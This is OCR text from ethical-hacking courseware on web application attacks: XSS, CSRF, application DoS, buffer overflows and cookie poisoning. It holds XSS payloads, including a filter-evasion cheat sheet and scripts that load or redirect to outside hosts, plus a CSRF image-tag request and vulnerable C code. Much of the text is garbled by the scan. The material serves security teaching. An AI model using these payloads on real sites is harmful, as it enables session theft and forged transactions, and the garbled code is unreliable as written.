63 Ethical Hacking and Countermeasures Hacking Web Applications X S S E x a m p l e : A t t a c k v i a E m a i l C E H r r r 1 U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r L e g itim a te S e rv e r < A H R E F = h t t p : / / j u g g y b o y b a n k. c a n / a m a licious lin k r e g i s t r a t i o n. c x j i? c l i e n t p r o f i l e = < S C R I P T > m a l i c i o u s c o d e < / S C R I P T» C l i c k h e r e < / A > th e URL to user and convince user to click on it Mi _ Request th e page o...! Page w ith m alicious scrip t Run... C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. X S S E x a m p l e : A t t a c k v i a E m a i l The fo llo w in g are th e steps involved in an XSS attack via em ail: 1. C onstruct a m alicious link: <AHREF=h t t p : / / ju g g y b o y b a n k.c o m /r e g is tr a tio n. c g i? c lie n tp r o file = < S C R IP T > m a lic io u s code</s C R IP T > > C lic k h e re < /A > 2. th e URL to th e user and convince th e user to click on it. 3. User requests th e page. 4. L e g itim a te server sends a response page w ith m alicious script. 5. M alicious scrip t runs on th e user's brow ser. Module 13 Page 1785 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

64 Ethical Hacking and Countermeasures Hacking Web Applications IS User's Browser M alicious Script A ttackers Server Legitim ate Server Q Construct a malicious link <A HREF=http: / / ^uggyboybeink. com / r e g i s t r a t i o n. c g i? c lie n tp r o file = < S C R I P T > m a lic io u s c o d e c /S C R I P T» C lic k h ere< /A > FIGURE : A tta c k v ia E m a il Module 13 Page 1786 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

65 Ethical Hacking and Countermeasures Hacking Web Applications X S S E x a m p l e : S t e a l i n g U s e r s ' C o o k i e s C E H U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r Host a page w ith m alicious script ^ ^ vkv i eiew w th e page hosted Dy by th e attacker HTML containing m alicious s c r i p t! ז...«Run... -! R e d ire ct to a tta cke r's server <... ( C ollect user's cookies Send th e request w ith th e user's cookies C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited X S S E x a m p l e : S t e a l i n g U s e r s * C o o k i e s vu To steal th e user's cookies w ith th e help o f an XSS attack, th e a tta cke r looks fo r XSS nera b ilitie s and th e n installs a cookie ste a le r (cookie logger). The fo llo w in g are th e various steps involved in stealing user's cookies w ith th e help o f XSS attack: 1. A tta cker in itia lly hosts a page w ith m alicious script 2. The user visits th e page hosted by atta cker 3. The atta cke r's server sends th e response as HTML co n ta in in g m alicious script 4. The user's bro w se r runs th e HTML m alicious script 5. The Cookie Logger present in th e m alicious script collects user's cookies 6. The m alicious script redirects th e user to atta cker's server 7. The user's bro w se r sends th e request w ith th e user's cookies Module 13 Page 1787 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

66 Ethical Hacking and Countermeasures Hacking Web Applications Malicious Script... View,- th e page hosted by th e attacker! I I H TM L c o n ta in in g m a lic io u s script!< ט ז...י מ U s e r's B ro w s e r 1 I a page w ith m a lic io u s s c rip t... ו... * I Run R edirect to attacker's!<... &... > d ' i I s e rv e r A tta c k e r 's S e rv e C o lle ct user s cookies Send th e re q u e s t w ith th e user's cookies Attacker's S e rv e r I FIGURE : S te a lin g U s e rs ' C o o k ie s Module 13 Page 1788 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

67 Ethical Hacking and Countermeasures Hacking Web Applications XSS E x a m p le : S e n d in g a n U n a u th o riz e d R e q u e s t C E H U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r A tta c k e r's S e rv e r C onstruct a m alicious link th e URL td user and convince user to click on it... * Request th e page I Page w ith m alicious script Run A n a u th o rize d re q u e st C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. X S S E x a m p l e : S e n d i n g a n U n a u t h o r i z e d R e q u e s t Using an XSS attack, th e a tta cke r can also send an unauth o rize d request. The fo llo w in g are th e steps involved in an XSS a tta ck intended to send an u n a u th o riz e d re q uest: 1. A tta cke r constructs a m alicious link 2. Sends an em ail conta in in g th e URL to user and convinces user to click on it 3. The user's bro w se r sends a request to th e atta cker's server fo r th e page 4. The atta cke r's server in response to th e user's request sends th e page w ith m alicious scrip t 5. The user's bro w se r runs th e m alicious script 6. The m alicious script sends an a u th o riz e d re q u e st Module 13 Page 1789 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

68 Ethical Hacking and Countermeasures Hacking Web Applications FIGURE : S e n d in g a n U n a u th o riz e d R e q u e s t Module 13 Page 1790 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

69 Ethical Hacking and Countermeasures Hacking Web Applications X S S A t t a c k i n B l o g P o s t i n g C E H 4 a Malicious code <script>onload= window.iocation= ' </script> is injecting the blog post U s e r r e d ir e c t e d to a m a lic io u s w e b s ite ju g g y b o y.co m Web Application Malicious Website C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited X S S A t t a c k i n a B l o g P o s t i n g The fo llo w in g diagram depicts th e XSS attack in a blog posting: A tta cker adds a m alicious script in th e c o m m e n t fie ld o f blog post Malicious code <script>onload= w indow. location= 'http ://w w w.ju g g ybcy.com ' </script> is injecting th e blog post C o m m ent w ith m alicious lin k is stored on the server U s e r r e d ir e c t e d t o a m a lic io u s w e b s it e ju g g y b o y. c o m Database Server W eb Application Malicious W ebsite FIGURE 13.20: XSS Attack in a Blog Posting Module 13 Page 1791 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

70 Ethical Hacking and Countermeasures Hacking Web Applications X S S A t t a c k i n C o m m e n t F i e l d C E H o o o o U s e r v is its th e I T e c h P o s t w e b s ite Face book acquires file-sharing service New York-based start-up that lets users privately and sporadicaty share fles through a drag-anddrop interface with additional options C o m m en t Jason, I love your blog post! - Mark (mark@miccasoft.com) Leave your com m ent Malicious code < s c rip t» a le rt ("H e ll o Wor Id ") < / sc r ip t> is injecting th e blog post H I ן H^lnVWnild D a t a b a s e S e r v e r C o m m e n t w ith m a lic io u s lin k is s to re d o n th e s e rv e r W e b A p p l i c a t i o n T he a le r t p o p s u p as so o n as th e w e b p ag e is lo a d e d I <*...i P o p u p W i n d o w C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. J X S S A t t a c k i n a C o m m e n t F i e l d M any In te rn e t w eb program s use HTML pages th a t dynam ically accept data fro m... d iffe re n t sources. The data in th e HTML pages can be d y n a m ic a lly changed according to th e request. A ttackers use th e HTML w eb page's tags to m a n ip u la te th e data and to launch th e attack by changing th e com m ents fe a tu re w ith a m alicious script. W hen th e ta rg e t sees th e c o m m e n t and activates it, th e n th e m a licio u s s c rip t is executed on th e ta rg e t's brow ser, in itia tin g m alicious perform ances. Module 13 Page 1792 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

71 Ethical Hacking and Countermeasures Hacking Web Applications a a s 1 I c c h P o M IMOM n.ort.tolo יי היי Facebook acquires file-sharing service N#w York baved start up that! tt users privately end sporadically share files through a drag and drop interfece with Additional op tion s Attacker Leave your comment Ja so n, 11 o v a y o u r blog p o st! < s c r i p t > a l e r t ( H e l l o W o r l d " ) < / s c r i p t > A tta cker adds a m alicious script In th e com m e nt fie ld o f blog post M alicious code < s c r i p t > a l e r t ( " H e l l o W o r l d " ) < / s c r i p t > is injecting the blog post Database Server Com m ent w ith m alicious link is stored on the server Web Application The a le rt pops up as soon as th e w e b page Is loaded Pop up W in do w FIGURE : XSS A tta c k in a C o m m e n t F ie ld Module 13 Page 1793 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

72 Ethical Hacking and Countermeasures Hacking Web Applications X S S C h e a t S h e e t H C E H UilifM itkiul Mm few XSS locator: {()}&=< XSS > -!; N o rm al XSS JavaScript injection: <SCRIPT SRC=h ttp ://h a x k e rs.o rg /x s s.js x /S C R IP T > <";( javascript:alert('xss = SRC Image XSS: <IM G N o q u o te s a n d no semicolon: <IMG SRC=javascript:alert( XSS')> Case insensitive XSS attack vector: <IM G SRC=JaVaScRIPt:alert('XSS')> HTML en title s: <1MG SRC =javascr ip t: ale rt (& q u o t; XSS&q u o t; )> Grave accent obfuscation: <IMG SRC= javascript :alert(" RSnake says, 'XSS'T> M a lfo rm e d IM G tags:<img > )</SCRIPT>" " x S C R IP T > a le rtf XSS" Em bedded tab : <IM G SRC«"Jav ascript:aiert('xss');h> Em bedded encoded tab : <IM G SRC jav& #x09;ascrlp t: ale rt (,XSS );" > Em bedded tab : <IM G SRC="jav ascript:aiert('xss');"> Em bedded encoded tab : <IM G > ";( XSS,) )av & # x 0 9 ;a s a lp t: ale rt SRC Em beded n ew lin e: <IM G SRC="jav&#xOA;ascript:alert('XSS');"> Em bedded carriage return: <1MG > ;) alertfxss : jav&#xod;ascript SRC NuN Chars: p eri -e 'p rin t "<1MG SRC=java\Oscri p t: ale rt(\"xss\" )> ";'> out N on-alpha-non-digit XSS: <SCR1PT/XSS SRC=" h ttp ^ /h a.d c ers^fg /x ss.js " x/s C R!P T> N on-alpha-non-digit p art 2 XSS: <BODY <( XSS rt< \K '= a le.,:;? /]@ 1 ()-+ & %!#$ onload Extraneous o pen brackets: «SCRJPT>alert("XSS") ; / / «/ SCR1PT> N o dosing script tags: <SCRIPT SRC= > Protocol reso lu tio n in script tags: <SCRIPT SRC //h a x k e rs.o rg /.j> Half o p en H TML/JavaScript XSS vector: <IM G = SRC javascript :alert('xss')" D ouble o pen angle brackets: < lfram e src h ttp ://h a.c k e rs.org/scriptlet.htmi < XSS w ith no single q u o tes o r double quotes or semicolons: SCRIPT>alert (/X S S /source K/SCRIPT> Escaping JavaScript escapes: \ a ; le rt('x S S ');// End title tag: </TTTlExSCRJPT>aiert( XSS );</SCRlPT> INPUT im age :<IN PUT TYPE=" IMAGE" > ;(' XSS SRC*" Javascri p t: ale rt (' IMG Dynsrc: <1MG > ) alertcxss ja va sa ip t DYNSRC IM G lowsrc:<im G < ) XSS "Javasalpt: ale r t f DYNSRC IMG lowsrc:<img LOWSRC=" javascript :alert('xss')"> BGSOUND:<BGSOUND > ;)' rt('xss ja va sa lp t :ale SRC LAYER:<LAYER SRC= " h ttp ://h a x k e rs.o rg / script le th tm T x /L A Y E R > REL="stylesheet STYLE sheet: <LINK > ;)* XSS, ja ' HREF va sa lp t :ale rt( Local htcfile:<xssstyle "behavk>r: urhxssjttc);"> VBscript in an Im age: <IMG * SRC v b s a ip t: m sgbox( XSS") > Mocha: <IMG SRC "Hvescript:[code]"> US-ASCII encoding: isaiptualert(exsse)i/saiptu META:<META H TTP-EQUfV-"rafrash" < ;( XSS ) CONTENT="0;uH=javascript:alert TABLE:<TABLE < ) XSS alert( javascript: D BACKGROUN TD:<TABLExTD < ) alert(*xss : ja va sa lp t D BACKGROUN Copyright by E & C au icfl. All Rights Reserved. Reproduction is Strictly Prohibited. X S S C h e a t S h e e t XSS locator -.' < X S S > = *{ ()} normal XSS ;a v a S a ip t in a ctio n <SCRIFT SRC=nttp J f ha tte rs o rg /c ss jsx/s C R IP T > * * 6 «p * Mo qikrtrc ח 4 m je m ic o to : <1MG Case *nsensitrve XSS a t t a o v e cto r < «*G Embedded carriage r e tu r n IMG.י: S R C = *jfg ^ k O O.a s c n p t a t e f t f X S S '^ M * O m n (K fl.-e *print < *A G SRC-ynvn \Oscnpta *ertf\*xssv > out W:m a!pr»»-n&n Ctg:t XSS <SCR1FT/XSS S H C :*n ttp y /h a ckers org/kss.js xv S C R IF T > p v t 2 XSS <SOOY << * I / - X S S? - * ( Evtraneous open brackets < <SCRIFT>eft ( TCSS y / «/5 C W F T > MG (SKiC^clMG a»ist1«jusdi 0vNs*c s t M G I f w V C < M 6 SGSOUND.-SGSOL'ND «< WOBSaRSJUSCft* S^ LAVER LAYER SHC= * H ttp y /n a.a efs.o rg /s c r1p tiet-m m J x /la Y E R > H TML entrties * IM G No O a su ^ senpt f g z. <SO U FT SRC =attpy/aa.cilers.org/css.js*«:*> G rave accent o d f ascatioa: < IM G Protocol resolution m senpt tags <SCRIPT S R C 0 & «6 0 1 * «נ 6 8 מ 8 S & C T V TCSS")'> SRC=//fca.clters.org/.j> S T Y U sheet: <UNK R E U - g T f e t t c g r > HREF= ttw650 ljj1>foixss local M c.fo e <XSS S T 1 U = '» e M w o r M a rfo rm e o IM G tags :IMG > < SCRIPT />< XSS ajert{ * xs C R IP T > * Emoedded ta tr <JMG SR C =*jav > ; TCSS'J w ^ t a k r ^ Em oeooefl encoded tab : < IM G SRC=*jjx&*»c09;ascnpt a *ert('xss'> / > Embedded t a t <1MG SRC= jay < :<' s» sji! ss s Em bedded encoded t a d : «IM G '> ; ( XSS ) n»ert SRC= '0x^acO9 ;ascnpt fflww ' G**> >. ) S! w M 1 «f la» n p t» l«r tlt C S S *C H a*f o p e K T M t/ja v a S c n p t X 5 vector d M G S R C = *» v «5 q n jt^ ie r^ X S S 7 ' Dootrte open angle Dradcets gty^tittpy/ha.cfcers.org/sertpttet.fttmi < XSS w r t t bo saftgte Quotes o r dow&te quotes or semacoftoaa: S C R *T > «le rt(/x S S /-S 0«1rc e > < /S a 1FT> Escaping J r a S c n p t escapes W a t e r * x s s y / Ena title tag < / T T m x s c R ^ > a ie r t ( * x s s * W s a a P T > INPUT m n JM FVT T Y P E = *IN»G E ' < imkratf,^ ' VBscript in an im a g e. <JMG > sgtx)»cf*xss7 SR C =Vtecript:m M o c M <JMG SRC= 1nrescnpt:JcodeI*> US-ASOI encoding go Tpya>m lex SSE fjxz> p lv M E T A < M E T A K T T F -E Q IW r-re fie s a * C 0 t a e m = 0 : m t = ff r K a T f t : * e r t fxss V > TABLE ctable b a c x g r o u n o = ^ ^ t y i p t t r t j r c s s f > T D x T A U f x T O > a*ertftcss7 *avascrw t =< i a c k g r o u m FIGURE 13.22: XSS Cheat Sheet Module 13 Page 1794 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

73 Ethical Hacking and Countermeasures Hacking Web Applications Cross-Site R equest F o rg e ry (CSRF) A ttack E (*rtifxd c 1 l \ lt»k4l IlMtm J C ross-s ite R e q u e st F o rg e ry (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e r a b ilitie s th a t a llo w an a tta c k e r t o fo rc e an u n s u s p e c tin g u s e r's b ro w s e r t o s e n d m a lic io u s re q u e s ts th e y d id n o t in te n d J T h e v ic tim u s e r h o ld s an a c tiv e sessio n w ith a tru s te d s ite a n d s im u lta n e o u s ly v is its a m a lic io u s s ite, w h ic h in je c ts an HTTP r e q u e s t fo r th e tru s te d s ite in to th e v ic tim u s e r's se ssio n, c o m p ro m is in g its in te g r ity fc User Logs in to th e tru sted site and creaitesa news! :sion Tru ste d W e b site > M alicious W ebsite S to res th e se ssio n id e n t f ie rfo rth e י sessio n in a c o o k ie in th e w eb b ro w ser... S ends a re q u e st fro m th e use r's! using his session cookie ! C opyright by E&C01nal.A ll Rights Reserved. Reproduction is Strictly Prohibited. C r o s s - s i t e R e q u e s t F o r g e r y ( C S R F ) A t t a c k Cross-site request fo rg e ry is also know n as a one-click attack. CSRF occurs w hen a user's w eb brow ser is instructed to send a request to the venerable w ebsite th ro u g h a m alicious w eb page. CSRF vu ln e ra b ilitie s are very com m o n ly found on fin a n c ia l-re la te d w ebsites. C orporate in tra n e ts usually ca n 't be accessed by th e outside attackers so CSRF is one o f th e sources to e n te r in to th e n e tw o rk. The lack o f the w eb applicatio n to d iffe re n tia te a request done by m alicious code fro m a genuine request exposes it to CSRF attack. Cross-Site request fo rg e ry (CSRF) attacks e xp lo it w eb page vu ln e ra b ilitie s th a t allow an attacker to force an unsuspecting user's brow ser to send m alicious requests th e y did not intend. The victim user holds an active session w ith a tru ste d site and sim ultaneously visits a m alicious site, w hich injects an HTTP request fo r th e tru ste d site in to th e victim user's session, com prom ising its in te g rity. Module 13 Page 1795 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

74 User O Trusted Website Malicious Website Logs into the trusted site and creates a new se sion י Stores the s!esslon Identffl er fo r the session In a clookle In the web browser י < Visits a ma aft Sends a request from the user's using his session cookie browser F IG U R E : C r o s s - s ite R e q u e s t F o r g e r y (C S R F ) A t t a c k M odule 13 Page 1796

75 H o w C S R F A t t a c k s W o r k In a cross-site request forgery attack, the attacker waits fo r the user to connect to the trusted server and then tricks the user to click on a malicious link containing arbitrary code. W hen the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The follow ing diagram explains the step-by-step process of a CSRF attack: M odule 13 Page 1797

76 Client Side Code Symbol k Shares <form action= buy.php" method="post"> <p>symbol: <input type="text" name- symbor /x/p> <p>shares: <input type-'text" name=,,shares /></p> <pxinput type="submit" value="buy" /></p> </form>r User logs into trusted server using his credentials o Server sets a session cookie In the user's browser Malicious code is executed in the trusted server Server Code <<?php s e s s io n _ s ta r t(); i f (isset($_request[' sym bol'] && i s s e t ($_REQUEST [ י sh ares ' ] )) {buy_stocks ($_REQUEST[ י symbol י ], $_REQUEST[ sh a re s ]);}?> r Trusted Server Attacker sends a phishing mall tricking user to send a request to a malicious site ט Attacker Response page contains malicious code User requests a page from the malicious server 0 Malicious Code < im g s r a = " h t t p : / / j u g g y b o y. o o r a /j u g g y s h o p. p h p? s y m b o l= M S F T & s h a r e s = ,r / > Malicious Server F IG U R E : H o w CSRF A t ta c k s W o r k M odule 13 Page 1798

77 W e b A p p l i c a t i o n D e n i a l - o f - S e r v i c e ( D o S ) A t t a c k CEH Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers W hy Are Applications Vulnerable? Reasonable Use of Expectations Application Environment Bottlenecks ג - Implementation Flaws - Poor Data Validation W e b S e r v e r R e s o u r c e C o n s u m p t i o n W e b S e r v i c e s U n a v a i l a b i l i t y i Targets CPU, Memory, and Sockets ג : - Disk Bandwidth : i - Database Bandwidth : - Worker Processes B O B B O B Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection : measures : Copyright by EG-G0llial. All Rights Reserved. Reproduction is Strictly Prohibited. י W e b A p p l i c a t i o n D e n i a l o f S e r v i c e ( D o S ) A t t a c k Denial-of-service attacks happen w hen the legitim ate users are prevented from perform ing a desired task or operation. A ttackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynam ic pages th a t require expensive search operations on the backend database servers. The follow ing issues make the w eb applications vulnerable: Reasonable Use of Expectations Application Environm ent Bottlenecks Im plem entation Flaws Poor Data Validation Application-level DoS attacks em ulate the same request syntax and netw ork-level traffic characteristics as th at of the legitim ate clients, which makes it undetectable by existing DoS protection measures. In web application denial-of-service attack the attacker targets and tries to exhaust CPU, m em ory, Sockets, disk bandw idth, database bandw idth, and w orker processes. Some o f th e co m m on ways to p erfo rm a w e b application DoS attack are: Bandwidth co nsu m p tion -flo o ding a n etw o rk w ith data M odule 13 Page 1799

78 Q Resource s ta rv a tio n -d e p le tin g a system 's resources P ro g ra m m in g fla w s -e x p lo itin g b u ffe r o ve rflo w s R outing and DNS a tta c k s -m a n ip u la tin g DNS tables to p o in t to a lte rn a te IP addresses M odule 13 Page 1800

79 - D e n i a l - o f - S e r v i c e ( D o S ) E x a m p l e s CEH User Registration DoS The a tta c k e r c o u ld c re a te a pro g ra m th a t subm its th e re g is tra tio n fo rm s repeatedly, adding a large n um ber o f spurious users to the application Login Attacks The a tta c k e r m ay o v e rlo a d th e lo gin process by co n tin u a lly sending lo gin requests th a t require th e p re s e n ta tio n tie r to access th e a u th e n tic a tio n mechanism, rendering it unavailable o r unreasonably slow to respond User Enumeration If a p p lic a tio n sta te s w h ic h p a rt o f th e user n a m e /p a s s w o rd p a ir is in c o rre c t, an a tta c k e r can a u to m a te th e process o f try in g c o m m o n user n a m e s fro m a dictionary file to enum erate the users o f the application Account Lock Out Attacks The a tta c k e r m ay e n u m e ra te user nam es th ro u g h a n o th e r v u ln e ra b ility in th e a p p lic a tio n and th e n a tte m p t to a u th e n tic a te to th e site using va lid user n a m e s a n d in c o rre c t passw o rd s, w h ic h w ill lo ck o u t th e a ccou nts a fte r th e sp e cifie d n u m b e r o f fa ile d a tte m p ts. A t th is p o in t le g itim a te users w ill not be able to use the site Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. D e n i a l o f S e r v i c e ( D o S ) E x a m p l e M o s t w e b a pp lica tions are designed to serve o r w ith s ta n d w ith lim ite d requests. If th e lim it is exceeded, th e w e b a p plication m a y fail th e server th e a d d ition a l requests. A ttacke rs use advantage to launch denial-of-service attacks on th e w e b applications. A ttackers send to o m an y requests to th e w e b ap p lica tio n until it gets exhausted. O nce th e w e b a p plication receives enou gh requests, it stops re s p o n d in g to o th e r re quest th o u g h it is sent by an a u th o riz e d user. This is because th e a tta cke r override s th e w e b a p plication w ith false requests. V arious w e b a p plication DoS attacks include: 6 User Registration DoS: The a tta cke r could create a pro g ra m th a t su b m its th e re g istra tion fo rm s re p e a te d ly adding a large n u m b e r o f spurious users to th e application. Login A tta cks: The login p ro ce d u re is ove rlo a d e d by th e a tta cke r by re p e a te d ly tra n s fe rrin g login requests th a t need th e p re se n ta tio n tie r to a d m it th e req u e st and access th e v e rifica tio n in structions. W h e n th e requests are o v e rlo a d e d, th e n th e process becom es slow o r unavailable to th e genuine users. Q User Enum eration: W h e n th e a p plication responds to any user a u th e n tic a tio n process w ith th e e rro r message declaring th e area o f in co rre ct in fo rm a tio n, th e n th e atta cke r can easily m a n ip u la te th e p ro ce d u re by b ru te fo rcin g th e c o m m o n user nam es fro m a d ictio n a ry file to e stim a te th e users o f th e applicatio n. M odule 13 Page 1801

80 0 Account Lock-Out Attacks: D ictio nary attacks can be m in im iz e d by applying th e a ccou nt lock m e th o d. The a tta cke r m ay e n u m e ra te user nam es th ro u g h v u ln e ra b ility in th e a p plication and th e n a tte m p t to a u th e n tic a te th e site using valid user nam es and in co rre ct passw ords th a t w ill lock o u t th e accounts a fte r th e specified n u m b e r o f failed a tte m p ts. A t this poin t, le g itim a te users w ill n o t be able to use th e site. M odule 13 Page 1802

81 B u f f e r O v e r f l o w A t t a c k s CEH B u ffe r o v e r flo w o c c u rs w h e n an a p p lic a tio n w r ite s m o re d a ta t o a b lo c k o f m e m o ry, o r b u ffe r, th a n th e b u ffe r is a llo c a te d to h o ld A b u ffe r o v e r flo w a tta c k a llo w s an a tta c k e r to m o d ify th e ta r g e t p ro c e s s 's a d d re s s sp a ce in o rd e r to c o n tro l th e p ro c e s s e x e c u tio n, cra sh th e process, and m o d ify internal variables A tta c k e rs m o d ify fu n c tio n p o in te rs used b y th e a p p lic a tio n to d ir e c t p ro g ra m e x e c u tio n th ro u g h a ju m p o r call in s tru c tio n a n d p o in ts it to a lo c a tio n in th e m e m o ry c o n ta in in g m alicious codes V Vulnerable Code in t main(int argc, char *argv[]) { char *dest_buffer; dest_buffer = (char *) malloc(10); i f (NULL = dest_buffer) return -1; if (argc > 1) { strcpy(dest_buffer, argv[ 1 ]); printf("the firs t oomnand-line argument is s.\n %, dest_buffer); ) else { printf ("No command-line argument was given. \n"); } f ree(dest_buf fer); return 0; } Note: For complete coverage of buffer overflow concepts and techniques, refer to M odule 18: Buffer Overflow Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. B u f f e r O v e r f l o w A t t a c k s A b u ffe r has a specified data storage capacity, and if th e c o u n t exceeds th e original, th e b u ffe r o ve rflo w s; this m eans th a t b u ffe r o v e rflo w occurs w h e n an a p plicatio n w rite s m o re data to a block o f m e m o ry, o r b u ffe r, th a n th e b u ffe r is allocated to hold. Typically, b uffers are deve lop e d to m a in ta in fin ite data; a d d ition a l in fo rm a tio n can be dire cte d w h e re v e r it needs to go. H o w eve r, extra in fo rm a tio n m ay o v e rflo w in to n e ig hb o rin g buffers, d e stro yin g or o v e rw ritin g legal data. A r b i t r a r y C o d e A b u ffe r o v e rflo w atta ck allow s an a tta cke r to m o d ify th e ta rg e t process's address space in o rd e r to c o n tro l th e process execution, crash th e process, and m o d ify interna l variables. W h e n a b u ffe r o ve rflo w s, th e execu tion stack o f a w e b ap p lica tio n is dam aged. An a tta cke r can th e n send specially crafted in p u t to th e w e b ap plication, so th a t th e w e b ap p lica tio n executes th e a rb itra ry code, a llo w in g th e a tta cke r to successfully take ove r th e m achine. A ttackers m o d ify fu n c tio n p o in te rs used by th e a p plica tion to re d ire ct th e pro g ra m e xecution th ro u g h a ju m p o r call in stru ctio n to a location in th e m e m o ry co n ta in in g m alicious code. B uffer o v e rflo w s are n o t easy to discover, and even upon discovery th e y are d iffic u lt to exploit. H ow e ver, th e a tta cke r w h o recognizes a p o te n tia l b u ffe r o v e rflo w can access a staggering array o f pro d u cts and c o m p o n e n ts. M odule 13 Page 1803

82 B u f f e r O v e r f l o w P o t e n t i a l Both the w eb application and server products, which act as static or dynam ic features of the site or o f the w eb application, contain the potential fo r a buffer overflow error. Buffer overflow potential th at is found in server products is com m only known and creates a th re at to the user of th a t product. W hen w eb applications use libraries, they become vulnerable to a possible buffer overflow attack. Custom w eb application code, through which a w eb application is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected. There are few er attackers w ho find and develop such errors. If it is found in the custom application (other than crash application), the capacity to use this error is reduced by the fact th a t both the source code and error message are not accessible to the attacker. V u l n e r a b l e C o d e i n t m a in ( in t a rg c, c h a r * a r g v [ ] ) { c h a r * d e s t _ b u f f e r ; d e s t_ b u ffe r = (c h a r *) m a llo c ( lo ) ; i f (NULL == d e s t_ b u ffe r ) r e t u r n - 1 ; i f (a rg c > 1) { s t r c p y ( d e s t _ b u f f e r, a r g v [ l ] ) ; p r i n t f ( " T h e f i r s t co m m an d-line argum ent i s % s.\n ", d e s t _ b u f f e r ) ; } e ls e { p r i n t f ( " N o co m m an d-line argum ent was g iv e n. \ n ) ; } f r e e ( d e s t _ b u f f e r ) ; r e t u r n 0; } Note: For com plete coverage o f buffer overflow concepts and techniques, refer to M odule 17: Buffer O verflow Attacks. M odule 13 Page 1804

83 I Cookie/Session Poisoning CEH ( rtifwd I itkitjl Nm Im Cookies are used to m aintain session state in the otherwise stateless HTTP protocol Modify the Cookie Content Inject the Malicious Content Rewriting the Session Data C o o k ie p o is o n in g a t ta c k s in v o lv e t h e m o d if ic a t io n o f t h e c o n t e n t s o f a c o o k ie ( p e r s o n a l in f o r m a t io n s to r e d in a w e b u s e r 's c o m p u t e r ) in o r d e r t o b y p a s s s e c u r it y m e c h a n is m s A P o is o n in g a llo w s a n a t ta c k e r t o in je c t t h e m a lic io u s c o n t e n t, m o d if y t h e u s e r 's o n lin e e x p e r ie n c e, a n d o b t a in t h e u n a u th o r iz e d in f o r m a t io n A p r o x y c a n b e u s e d f o r r e w r it in g t h e s e s s io n d a t a, d is p la y in g t h e c o o k ie d a t a, a n d / o r s p e c ify in g a n e w u s e r ID o r o t h e r s e s s io n id e n t if ie r s in t h e c o o k ie Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. C o o k i e / S e s s i o n P o i s o n i n g Cookies frequently transm it sensitive credentials and can be m odified w ith ease to escalate access or assume the identity of another user. Cookies are used to m aintain a session state in the otherw ise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the w eb application. Poisoning of cookies and session inform ation can allow an attacker to inject malicious content or otherw ise m odify the user's on-line experience and obtain unauthorized inform ation. Cookies can contain session-specific data such as user IDs, passwords, account num bers, links to shopping cart contents, supplied private inform ation, and session IDs. Cookies exist as files stored in the client com puter's m em ory or hard disk. By m odifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. M any sites offer the ability to "R em em ber m e?" and store the user's inform ation in a cookie, so he or she does not have to re-enter the data w ith every visit to the site. Any private inform ation entered is stored in a cookie. In an a tte m p t to protect cookies, site developers often encode the cookies. Easily reversible encoding m ethods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give m any w ho view cookies a false sense o f security. M odule 13 Page 1805

84 Threats The com prom ise of cookies and sessions can provide an attacker w ith user credentials, allowing the attacker to access the account in order to assume the identity of o the r users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access th at the vulnerable web application provides are open fo r the attacker to exploit. One of the easiest examples involves using the cookie directly fo r a uth en tica tion. A nother m ethod of cookie/session poisoning uses a proxy to rew rite the session data, displaying the cookie data a n d /o r specifying a new user ID or o the r session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure. It can be one of these fo u r variants. Persistent cookies are stored on a disk and non-persistent cookies are stored in m em ory. Secure cookies are transferred only through SSL connections. M odule 13 Page 1806

